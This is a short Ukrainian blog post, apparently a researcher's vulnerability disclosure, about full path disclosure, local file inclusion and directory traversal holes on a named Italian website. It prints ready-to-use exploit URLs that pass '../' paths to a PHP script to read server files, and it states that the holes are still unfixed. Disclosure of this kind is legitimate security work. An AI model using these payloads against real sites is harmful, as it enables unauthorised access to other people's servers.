Уразливості на www.fvpadula.it
19:28 16.12.200830.05.2008
У жовтні, 26.10.2007, я знайшов Full path disclosure, Local File Inclusion та Directory Traversal уразливості на проекті http://www.fvpadula.it. Про що найближчим часом сповіщу адміністрацію проекту.
Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.
16.12.2008
Full path disclosure:
http://www.fvpadula.it/news/autohtml.php?op=modload&name=1.html&file=index
Local File Inclusion та Directory Traversal:
http://www.fvpadula.it/news/autohtml.php?op=modload&name=../robots.txt&file=index
http://www.fvpadula.it/news/autohtml.php?op=modload&name=../file.php&file=index
Дані уразливості досі не виправлені.